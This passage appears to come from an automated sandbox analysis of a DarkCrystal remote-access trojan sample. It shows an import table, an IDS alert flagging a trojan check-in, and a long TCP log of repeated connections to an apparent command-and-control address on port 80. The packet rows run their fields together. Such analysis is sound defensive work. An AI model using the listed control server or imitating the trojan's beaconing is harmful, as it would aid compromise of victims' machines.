InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage |
| OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear |
| gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-01T02:27:13.424963+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49732 | 185.239.51.56 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                  Jan 1, 2025 02:27:14.038362980 CET8049732185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.063793898 CET4973780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.065717936 CET4973580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.068665981 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.068733931 CET4973780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.068859100 CET4973780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.068979979 CET4973780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.070580959 CET8049735185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.070606947 CET8049735185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.070616007 CET8049735185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.073652983 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.073714018 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.073869944 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.432113886 CET8049735185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.443099976 CET8049735185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.443159103 CET4973580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.443195105 CET8049735185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.443240881 CET4973580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.443337917 CET4973580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.448132992 CET8049735185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.629519939 CET4973880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.634428978 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.634505033 CET4973880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.634640932 CET4973880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.639453888 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.842042923 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.848452091 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.848514080 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.848530054 CET4973780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.848578930 CET4973780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.848716974 CET4973780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.853485107 CET8049737185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.854893923 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.859720945 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.859807968 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.859915972 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.864712000 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.987566948 CET4973880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:14.992398024 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.992415905 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:14.992424965 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.206470966 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.211349010 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211360931 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211368084 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211375952 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211391926 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.211395025 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211401939 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211406946 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211435080 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.211452007 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.211483955 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.211599112 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211606979 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211613894 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.211642981 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.211662054 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.216201067 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.216209888 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.216248035 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.216248035 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.216257095 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.216272116 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.216279030 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.216294050 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.216331005 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.263334990 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.263427973 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.315232992 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.315279961 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.336150885 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.342812061 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.342966080 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.346797943 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.346905947 CET4973880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.346906900 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.346951962 CET4973880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.347060919 CET4973880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.347732067 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347765923 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347779036 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347786903 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347831964 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347840071 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347913980 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347928047 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347934961 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347942114 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347976923 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347985983 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347989082 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.347991943 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.348012924 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.348018885 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.348095894 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.351784945 CET8049738185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.467542887 CET4974380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.472357035 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.472441912 CET4974380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.472629070 CET4974380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.477387905 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.560447931 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.612462044 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.831309080 CET4974380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.836231947 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.836242914 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.836250067 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.959947109 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.960136890 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.960351944 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:15.961081028 CET4974280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:15.964986086 CET8049742185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.171907902 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.187468052 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.187525988 CET4974380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:16.187577009 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.187796116 CET4974380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:16.187810898 CET4974380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:16.192584991 CET8049743185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.375456095 CET4974480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:16.380310059 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.381932974 CET4974480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:16.382376909 CET4974480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:16.387176037 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.737540960 CET4974480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:16.742511988 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.742522955 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:16.742528915 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.101691008 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.143714905 CET4974480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:17.238337994 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.238564968 CET4974480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:17.238718033 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.238759041 CET4974480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:17.243338108 CET8049744185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.363675117 CET4974680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:17.368539095 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.368593931 CET4974680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:17.368746996 CET4974680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:17.373554945 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.722012997 CET4974680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:17.726948977 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.726962090 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:17.726972103 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.079006910 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.087153912 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.087194920 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.087229013 CET4974680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:18.087259054 CET4974680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:18.087421894 CET4974680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:18.092122078 CET8049746185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.202312946 CET4974780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:18.207323074 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.207384109 CET4974780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:18.207506895 CET4974780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:18.212299109 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.566746950 CET4974780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:18.571616888 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.571628094 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.571635962 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.908637047 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:18.956228018 CET4974780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:19.045605898 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:19.045831919 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:19.045888901 CET4974780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:19.046040058 CET4974780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:19.050827980 CET8049747185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:19.247579098 CET4974980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:19.252585888 CET8049749185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:30.643623114 CET8049764185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:30.643665075 CET4976480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:30.645823002 CET4976480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:30.650640011 CET8049764185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:30.789735079 CET4976580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:30.794667006 CET8049765185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:30.794734001 CET4976580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:30.794894934 CET4976580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:30.799638033 CET8049765185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.143925905 CET4976580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.148896933 CET8049765185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.148910046 CET8049765185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.148920059 CET8049765185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.348084927 CET4976580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.348090887 CET4976680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.352965117 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.353118896 CET8049765185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.353214025 CET4976580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.353226900 CET4976680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.353368044 CET4976680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.358175993 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.466975927 CET4976780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.471826077 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.471903086 CET4976780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.472045898 CET4976780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.476800919 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.706341982 CET4976680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.711236000 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.711354971 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.831330061 CET4976780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:31.837369919 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.837379932 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:31.837393999 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.063597918 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.070955038 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.070971966 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.071008921 CET4976680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.071042061 CET4976680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.071136951 CET4976680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.075912952 CET8049766185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.190228939 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.237534046 CET4976780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.324203014 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.324350119 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.324368954 CET4976780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.324481010 CET4976780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.329097986 CET8049767185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.436744928 CET4976880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.441550970 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.441715002 CET4976880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.441804886 CET4976880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.446540117 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.800178051 CET4976880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:32.805141926 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.805159092 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:32.805170059 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.174192905 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.180530071 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.180541992 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.180615902 CET4976880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:33.183947086 CET4976880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:33.188781977 CET8049768185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.375112057 CET4976980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:33.380033016 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.380105972 CET4976980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:33.380225897 CET4976980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:33.385026932 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.737597942 CET4976980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:33.742604017 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.742616892 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:33.742624998 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.102540016 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.143762112 CET4976980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:34.265361071 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.265578985 CET4976980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:34.265599966 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.265678883 CET4976980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:34.270363092 CET8049769185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.389981031 CET4977080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:34.394857883 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.394933939 CET4977080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:34.395034075 CET4977080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:34.399796009 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.753231049 CET4977080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:34.758220911 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.758233070 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:34.758245945 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.095901012 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.104477882 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.104490995 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.108530045 CET4977080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:35.108613968 CET4977080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:35.113349915 CET8049770185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.233838081 CET4977180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:35.238786936 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.240350962 CET4977180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:35.240425110 CET4977180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:35.245289087 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.597012997 CET4977180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:35.601943016 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.601954937 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.601964951 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.940613031 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:35.987518072 CET4977180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:36.077573061 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.077836990 CET4977180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:36.078314066 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.078360081 CET4977180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:36.082664967 CET8049771185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.206160069 CET4977280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:36.211061001 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.211127043 CET4977280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:36.211234093 CET4977280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:36.215997934 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.565721035 CET4977280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:36.570625067 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.570636988 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.570645094 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.932197094 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:36.987519979 CET4977280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.069775105 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.069891930 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.069952965 CET4977280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.069989920 CET4977280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.074750900 CET8049772185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.082376003 CET4977380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.087265015 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.089979887 CET4977380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.090503931 CET4977380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.095307112 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.185524940 CET4977480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.190568924 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.190673113 CET4977480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.190767050 CET4977480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.195586920 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.440850019 CET4977380192.168.2.4185.239.51.56
